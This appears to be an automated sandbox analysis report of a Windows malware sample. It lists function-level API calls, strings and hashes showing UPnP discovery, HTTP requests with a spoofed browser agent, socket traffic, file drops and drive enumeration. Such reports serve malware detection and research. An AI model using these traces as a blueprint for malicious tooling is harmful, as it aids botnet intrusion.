sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
Sleep.KERNELBASE(000003E8), ref: 0040DB2E
StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E

Strings

LOCATION: , xrefs: 0040DB55
HTTP/1.1 200 OK, xrefs: 0040DB3F

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Sleeprecvfrom
String ID: HTTP/1.1 200 OK$LOCATION:
API String ID: 668330359-3973262388
Opcode ID: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
Instruction ID: 994a5b39e446e5258177b8a9e706ad28fc86481e8e9e2fe7090657293928531c
Opcode Fuzzy Hash: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
Instruction Fuzzy Hash: 3A2151B0D44218ABDB20DB64DC45BE97774AB04308F1486E9E719B72C0C6B95ACACF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC70 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EC87
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040ECA6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040ECCF
InternetCloseHandle.WININET(00000000), ref: 0040ECF8
InternetCloseHandle.WININET(00000000), ref: 0040ED02
Sleep.KERNELBASE(000003E8), ref: 0040ED0D

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EC82

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
API String ID: 2743515581-2272513262
Opcode ID: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
Instruction ID: 7e4e1c9f171caca0646539a3bded0a22de56d1af13d1156f275757e23962dbb7
Opcode Fuzzy Hash: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
Instruction Fuzzy Hash: 27213A74A40348FBEB14DF94CC49FEEB775AB04704F1084A9FA11AB2D0C7BA6A40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AE58
WriteFile.KERNELBASE(000000FF,00000000,?,?,00000000), ref: 0040AE79
FlushFileBuffers.KERNEL32(000000FF), ref: 0040AE83
CloseHandle.KERNEL32(000000FF), ref: 0040AE8D
InterlockedExchange.KERNEL32(00416068,0000003D), ref: 0040AE9A

Strings

C:\Users\user\tbtnds.dat, xrefs: 0040AE53

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
String ID: C:\Users\user\tbtnds.dat
API String ID: 442028454-681901067
Opcode ID: 6f59d5be5e34e3d070bb4230317ffaf4271f876ca047c3a08f5284c4181a4651
Instruction ID: 0da220b8b1f77c32e275edd0b19d3e77d455ccd5d956affd98337f50121a7ab7
Opcode Fuzzy Hash: 6f59d5be5e34e3d070bb4230317ffaf4271f876ca047c3a08f5284c4181a4651
Instruction Fuzzy Hash: D5315EB8A40309EBCB14CF98DC45F9EB771FB48300F208569E51567390D774AA51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00407380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000003E8), ref: 00407404
Sleep.KERNELBASE(000003E8), ref: 00407433
wsprintfA.USER32 ref: 0040745E
DeleteUrlCacheEntry.WININET(?), ref: 0040746E
Sleep.KERNEL32(000DBBA0), ref: 004074B6

Strings

%s%s, xrefs: 00407452

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Sleep$CacheDeleteEntrywsprintf
String ID: %s%s
API String ID: 1447977647-3252725368
Opcode ID: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
Instruction ID: a0bb0d1763f58919fadf504be34b28e9f79e59c8b133fe7279793914b8ec670d
Opcode Fuzzy Hash: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
Instruction Fuzzy Hash: 92310AB0D05218EFCB50DF99DC88BDDBBB4FB48304F1085AAE609B6290D7795A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406340 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 00406346
RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
RegCloseKey.KERNELBASE(?), ref: 004063DE

Strings

NoDrives, xrefs: 004063B8
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3A0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4

Part of subcall function 0040D490: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D4D0
Part of subcall function 0040D490: CloseHandle.KERNEL32(?), ref: 0040D4E9

CreateThread.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 0040D41F
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
String ID:
API String ID: 2251373460-0
Opcode ID: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
Instruction ID: 3905a71daa0159e526e2bdbd6071991b109cebefbf6d86c4cf37b1ecd5ad8e98
Opcode Fuzzy Hash: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
Instruction Fuzzy Hash: F831F8B4A00208EFDB04DF94D889F9EBBB5EB48308F0081A9E945A7390D775AA95CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
htons.WS2_32(?), ref: 00401281
sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE

Strings

pdu, xrefs: 0040121D

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedhtonsmemcpysendto
String ID: pdu
API String ID: 2164660128-2320407122
Opcode ID: 03596814560310664b4f78611db666ac15f7015c2758b53f67dc60419e7b6bb9
Instruction ID: 2eaa47314137ae48bc86a2d98b28c98b453a90a93c27253c89cefaff09ddeb80
Opcode Fuzzy Hash: 03596814560310664b4f78611db666ac15f7015c2758b53f67dc60419e7b6bb9
Instruction Fuzzy Hash: 7031B2362083009BC710DF6DD880A9BBBE4AFC9714F04457EFD98A7382D6349914C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00406F50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,00407C66), ref: 00406F58
SysAllocString.OLEAUT32(C:\Users\user\AppData\Local\Temp\135143440.exe), ref: 00406F63
CoUninitialize.OLE32 ref: 00406F88

Part of subcall function 00406FA0: SysFreeString.OLEAUT32(00000000), ref: 004071B8

SysFreeString.OLEAUT32(00000000), ref: 00406F82

Strings

C:\Users\user\AppData\Local\Temp\135143440.exe, xrefs: 00406F5E

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: String$Free$AllocInitializeUninitialize
String ID: C:\Users\user\AppData\Local\Temp\135143440.exe
API String ID: 459949847-2853581951
Opcode ID: d37febddbfc04ccb5ddcd79972a62c48e1c377c34fe451ccbb6e607dda6765f2
Instruction ID: 8a6b4e1f6fa2c5cc19a61eea1a68b2ec0aac259eb3575b686c6209df8efe477e
Opcode Fuzzy Hash: d37febddbfc04ccb5ddcd79972a62c48e1c377c34fe451ccbb6e607dda6765f2
Instruction Fuzzy Hash: 98E092B4A40208FBD7009BE0ED0EB8D77349B05305F0040A4F90666291DAB95E80C755

Uniqueness

Uniqueness Score: -1.00%

Function 004062C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNELBASE(0040629F), ref: 004062CD
QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 00406324

Strings

\??\, xrefs: 00406318

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040E9F2

Strings

`k@, xrefs: 0040E9CC, 0040E9CF

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationSize
String ID: `k@
API String ID: 4178644524-1195631054
Opcode ID: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
Instruction ID: 241503f102ff988800a1529ff4214dfa730f02490b079578101ca7fb38dafef3
Opcode Fuzzy Hash: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
Instruction Fuzzy Hash: F7F01C74A40308FBDB20DFA4DC49B8DBBB4AB04701F208295FA04BB2D0D6B56A908B44

Uniqueness

Uniqueness Score: -1.00%

Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0040112B
recvfrom.WS2_32 ref: 0040119C
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
String ID:
API String ID: 3980219359-0
Opcode ID: 7cf137ea0161487f7737358bd29a50fac6b28174b756953d330c0cbf6919b593
Instruction ID: e93cb10c30494a4e33d228fb1a439b2c2c35c7ccb48714dd22f79771c93e9d83
Opcode Fuzzy Hash: 7cf137ea0161487f7737358bd29a50fac6b28174b756953d330c0cbf6919b593
Instruction Fuzzy Hash: E921E5B11043016FC304DF65DC84A6BB7E9EF88314F004A3EF55592290E774DD4887EA

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 00407230: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407250

SysFreeString.OLEAUT32(00000000), ref: 004071B8

Strings

Microsoft Corporation, xrefs: 00407126

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CreateFreeInstanceString
String ID: Microsoft Corporation
API String ID: 586785272-3838278685
Opcode ID: e7592a1b6a7ca93a492843d129d0f5c494d0862bf32e99145538b4b10712f6f9
Instruction ID: b15f4297b17ed5f57f8313cde646c824d4e9e4ad422ceb8e026561d0ece074f1
Opcode Fuzzy Hash: e7592a1b6a7ca93a492843d129d0f5c494d0862bf32e99145538b4b10712f6f9
Instruction Fuzzy Hash: 9591FD75A0450ADFCB04DF94C894AAFB3B5BF49304F208169E515BB3E4D734AD42CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040D880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407C61), ref: 0040D88A

Part of subcall function 0040D950: socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
Part of subcall function 0040D950: htons.WS2_32(0000076C), ref: 0040D9A0
Part of subcall function 0040D950: inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
Part of subcall function 0040D950: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD
Part of subcall function 0040D950: bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
Part of subcall function 0040D950: lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
Part of subcall function 0040D950: sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
Part of subcall function 0040D950: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45

Part of subcall function 0040DBC0: SysFreeString.OLEAUT32(00000000), ref: 0040DC9B
Part of subcall function 0040DBC0: SysFreeString.OLEAUT32(00000000), ref: 0040DCA5

Strings

UDP, xrefs: 0040D918
TCP, xrefs: 0040D8FB

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
String ID: TCP$UDP
API String ID: 1519345861-1097902612
Opcode ID: 23e2b161602aa368edb7d0b330d9f7272b4556a0a3daad279aa881e4cc12a6d8
Instruction ID: adc5519654865a9846dc14ee6574ade53ee5e8f68d7e54780b62f97b8647e200
Opcode Fuzzy Hash: 23e2b161602aa368edb7d0b330d9f7272b4556a0a3daad279aa881e4cc12a6d8
Instruction Fuzzy Hash: FE11AFB5E04208EBDB00EFD5EC45BAE7778EB44308F1088AAE510772C2E6785A54CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD10 Relevance: 4.6, APIs: 3, Instructions: 120COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CD1C
InterlockedIncrement.KERNEL32(000000FF), ref: 0040CD51
InterlockedDecrement.KERNEL32(000000FF), ref: 0040CE54

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Interlocked$DecrementExchangeIncrement
String ID:
API String ID: 2813130747-0
Opcode ID: 7eca04d12bb9d05337c201d62d9712200ab57323bc6eb365ab38248f78f31c1e
Instruction ID: 1c7eeb495bf0c40ce5b1f0ecd416c92c842ec860dbf3e71f0667dc4b3018cc5d
Opcode Fuzzy Hash: 7eca04d12bb9d05337c201d62d9712200ab57323bc6eb365ab38248f78f31c1e
Instruction Fuzzy Hash: 7A41C5B5E00204FBDF00DBA4D885BAF7B75AF04304F048269F5057B2C2D679AA4187DA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Twizt,0040CD76,0040CD76,?,?,0040CD76,000000FF,0040CD76,0040CD76,000000FF,00000000), ref: 0040B70C

Strings

Twizt, xrefs: 0040B713
Twizt, xrefs: 0040B707

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: Twizt$Twizt
API String ID: 1659193697-16428492
Opcode ID: 28c6feef410d2018e6e3de035ae19f054df257f5425241415404bfbee8c49d30
Instruction ID: 84ca981f6759ac35c37697c13bd51ebdb7c58ca5c34682a8d32d29454b0b1397
Opcode Fuzzy Hash: 28c6feef410d2018e6e3de035ae19f054df257f5425241415404bfbee8c49d30
Instruction Fuzzy Hash: C1110075900108BFCB04DF98D841D9EBBB5EF48304F14C1A9FD19AB342D635EA10CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D000 Relevance: 4.5, APIs: 3, Instructions: 45networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 0040D013
htons.WS2_32(00009E34), ref: 0040D045
connect.WS2_32(000000FF,?,00000010), ref: 0040D05F

Part of subcall function 0040AD80: shutdown.WS2_32(0040AD6D,00000002), ref: 0040AD89
Part of subcall function 0040AD80: closesocket.WS2_32(0040AD6D), ref: 0040AD93

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: closesocketconnecthtonsshutdownsocket
String ID:
API String ID: 1987800339-0
Opcode ID: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
Instruction ID: 2e7e6d0bbd3fe3fffc8dbbd22c1a4ff0b41f748ad7b4bc9bd1ee776ebcbe5d5a
Opcode Fuzzy Hash: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
Instruction Fuzzy Hash: E9115E74D05209EBCB10DFE4D909AAEB770AF08324F2042A9E829A73D0D7744F05975A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0B0 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040A090: GetCurrentProcessId.KERNEL32(?,00409FFB,?,0040C90E,00000010,?,?,?,?,?,?,0040C67B), ref: 0040A093

HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,0040A007,?,0040C90E,00000010,?,?,?,?,?,?,0040C67B), ref: 0040A0DC
HeapSetInformation.KERNEL32(021A0000,00000000,00000002,00000004), ref: 0040A106
GetCurrentProcessId.KERNEL32 ref: 0040A10C

Part of subcall function 0040A120: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A13C

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

